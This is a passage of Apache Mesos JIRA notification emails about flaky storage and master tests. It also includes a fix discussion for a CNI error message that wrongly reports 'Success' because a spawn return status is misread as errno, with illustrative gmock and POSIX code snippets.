> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8474:

Attachment: consoleText.txt

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Assignee: Chun-Hung Hsiao
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt, consoleText.txt
>
>
> Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8478:

Labels: flaky flaky-test mesosphere  (was: )

> Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
> ---
>
> Key: MESOS-8478
> URL: https://issues.apache.org/jira/browse/MESOS-8478
> Project: Mesos
>  Issue Type: Bug
>  Components: master, test
>Affects Versions: 1.6.0
>Reporter: Benjamin Bannier
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on a plain cmake build on ubuntu-16.04 at 
> {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}},
> {noformat}
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269
> Mock function called more times than expected - returning default value.
> Function call: authorized(@0x7fe1108c61e0 48-byte object  E1-7F 00-00 00-00 00-00 00-00 00-00 07-00 00-00 00-00 00-00 D0-5F 05-E8 E0-7F 
> 00-00 C0-E9 03-E8 E0-7F 00-00 02-00 00-00 E1-7F 00-00>)
>   Returns: Abandoned
>  Expected: to be called once
>Actual: called twice - over-saturated and active
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8478?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8478:

Attachment: consoleText.txt

> Test MasterTestPrePostReservationRefinement.LaunchTask is flaky
> ---
>
> Key: MESOS-8478
> URL: https://issues.apache.org/jira/browse/MESOS-8478
> Project: Mesos
>  Issue Type: Bug
>  Components: master, test
>Affects Versions: 1.6.0
>Reporter: Benjamin Bannier
>Priority: Major
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on a plain cmake build on ubuntu-16.04 at 
> {{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}},
> {noformat}
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269
> Mock function called more times than expected - returning default value.
> Function call: authorized(@0x7fe1108c61e0 48-byte object  E1-7F 00-00 00-00 00-00 00-00 00-00 07-00 00-00 00-00 00-00 D0-5F 05-E8 E0-7F 
> 00-00 C0-E9 03-E8 E0-7F 00-00 02-00 00-00 E1-7F 00-00>)
>   Returns: Abandoned
>  Expected: to be called once
>Actual: called twice - over-saturated and active
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8478) Test MasterTestPrePostReservationRefinement.LaunchTask is flaky

2018-01-23 Thread Benjamin Bannier (JIRA)
Benjamin Bannier created MESOS-8478:
---

 Summary: Test MasterTestPrePostReservationRefinement.LaunchTask is 
flaky
 Key: MESOS-8478
 URL: https://issues.apache.org/jira/browse/MESOS-8478
 Project: Mesos
  Issue Type: Bug
  Components: master, test
Affects Versions: 1.6.0
Reporter: Benjamin Bannier


Observed on our internal CI on a plain cmake build on ubuntu-16.04 at 
{{e91ce42ed56c5ab65220fbba740a8a50c7f835ae}},

{noformat}
/home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/master_tests.cpp:9269
Mock function called more times than expected - returning default value.
Function call: authorized(@0x7fe1108c61e0 48-byte object )
  Returns: Abandoned
 Expected: to be called once
   Actual: called twice - over-saturated and active
{noformat}
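
For readers unfamiliar with the gmock wording above: "over-saturated" means an 
expectation whose allowed call count has already been used up. The minimal, 
self-contained sketch below (a hypothetical {{MockAuthorizer}}, unrelated to 
the actual Mesos authorizer code) reproduces the same kind of failure: the 
expectation permits exactly one call, so a second call makes gmock print "Mock 
function called more times than expected - returning default value" and fail 
the test.

{noformat}
#include <gmock/gmock.h>
#include <gtest/gtest.h>

using ::testing::_;
using ::testing::Return;

// Hypothetical interface used only to illustrate the failure mode.
class Authorizer
{
public:
  virtual ~Authorizer() {}
  virtual bool authorized(int request) = 0;
};


class MockAuthorizer : public Authorizer
{
public:
  MOCK_METHOD1(authorized, bool(int request));
};


TEST(OverSaturationExample, MockCalledMoreTimesThanExpected)
{
  MockAuthorizer authorizer;

  // `WillOnce` implies `Times(1)`, so the expectation is saturated after a
  // single call ...
  EXPECT_CALL(authorizer, authorized(_))
    .WillOnce(Return(true));

  EXPECT_TRUE(authorizer.authorized(1));

  // ... and this second call "over-saturates" it: gmock records a test
  // failure and returns the default value for `bool`, which is `false`.
  EXPECT_FALSE(authorizer.authorized(2));
}
{noformat}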



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-6822) CNI reports confusing error message for failed interface setup.

2018-01-23 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16335568#comment-16335568
 ] 

Qian Zhang commented on MESOS-6822:
---

The way we check the return value of {{os::spawn}} is not correct: we return 
{{os::strerror(errno)}} whenever {{os::spawn}} returns non-zero. However, if 
you look at the implementation of {{os::spawn}}, it calls {{waitpid}} on the 
child process and returns the child's exit status. So when the child process 
exits with a non-zero status (e.g., 127 if the command to be executed cannot 
be found), we still return {{os::strerror(errno)}}, which at that point is 
{{Success}} because {{waitpid}} itself succeeded. That is why the error 
message in the description ends with "Success".

We should handle the return value of {{os::spawn}} the same way the following 
code does:

https://github.com/apache/mesos/blob/1.4.1/src/linux/fs.cpp#L481:L497
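
For illustration, here is a minimal, self-contained sketch (plain POSIX C++, 
not Mesos/stout code) of that distinction. The {{run}} helper below is a 
hypothetical stand-in for {{os::spawn}}: it returns -1 only when the 
fork/waitpid plumbing itself fails (and only then is {{errno}} meaningful), 
and otherwise returns the raw {{waitpid}} status, which the caller has to 
decode with {{WIFEXITED}}/{{WEXITSTATUS}} instead of treating any non-zero 
value as an errno.

{noformat}
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <cerrno>
#include <cstring>
#include <iostream>
#include <string>
#include <vector>

// Hypothetical stand-in for `os::spawn`: fork + execvp + waitpid.
static int run(const std::string& command, const std::vector<std::string>& args)
{
  pid_t pid = fork();
  if (pid == -1) {
    return -1; // fork failed; `errno` is meaningful to the caller.
  }

  if (pid == 0) {
    std::vector<char*> argv;
    argv.push_back(const_cast<char*>(command.c_str()));
    for (const std::string& arg : args) {
      argv.push_back(const_cast<char*>(arg.c_str()));
    }
    argv.push_back(nullptr);

    execvp(command.c_str(), argv.data());
    _exit(127); // exec failed, e.g., the command was not found.
  }

  int status = 0;
  if (waitpid(pid, &status, 0) == -1) {
    return -1; // waitpid failed; `errno` is meaningful to the caller.
  }

  return status; // Raw waitpid status, NOT an errno value.
}


int main()
{
  int status = run("ifconfig", {"lo", "up"});

  if (status == -1) {
    // Only in this branch does `errno` describe the failure.
    std::cerr << "Failed to execute ifconfig: " << std::strerror(errno)
              << std::endl;
  } else if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
    // The child ran but did not succeed; `errno` is NOT meaningful here, so
    // decode the waitpid status instead of calling strerror(errno).
    if (WIFEXITED(status)) {
      std::cerr << "ifconfig exited with code " << WEXITSTATUS(status)
                << std::endl;
    } else {
      std::cerr << "ifconfig was terminated by a signal" << std::endl;
    }
  } else {
    std::cout << "ifconfig succeeded" << std::endl;
  }

  return 0;
}
{noformat}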

> CNI reports confusing error message for failed interface setup.
> ---
>
> Key: MESOS-6822
> URL: https://issues.apache.org/jira/browse/MESOS-6822
> Project: Mesos
>  Issue Type: Bug
>  Components: network
>Affects Versions: 1.1.0
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>
> Saw this today:
> {noformat}
> Failed to bring up the loopback interface in the new network namespace of pid 
> 17067: Success
> {noformat}
> which is produced by this code: 
> https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859
> Note that ssh'ing into the machine confirmed that {{ifconfig}} is available 
> in {{PATH}}.
> Full log: http://pastebin.com/hVdNz6yk



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-6822) CNI reports confusing error message for failed interface setup.

2018-01-23 Thread Qian Zhang (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Qian Zhang updated MESOS-6822:
--
Shepherd: Jie Yu
Story Points: 2
  Sprint: Mesosphere Sprint 73
Target Version/s: 1.6.0

> CNI reports confusing error message for failed interface setup.
> ---
>
> Key: MESOS-6822
> URL: https://issues.apache.org/jira/browse/MESOS-6822
> Project: Mesos
>  Issue Type: Bug
>  Components: network
>Affects Versions: 1.1.0
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>
> Saw this today:
> {noformat}
> Failed to bring up the loopback interface in the new network namespace of pid 
> 17067: Success
> {noformat}
> which is produced by this code: 
> https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859
> Note that ssh'ing into the machine confirmed that {{ifconfig}} is available 
> in {{PATH}}.
> Full log: http://pastebin.com/hVdNz6yk



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)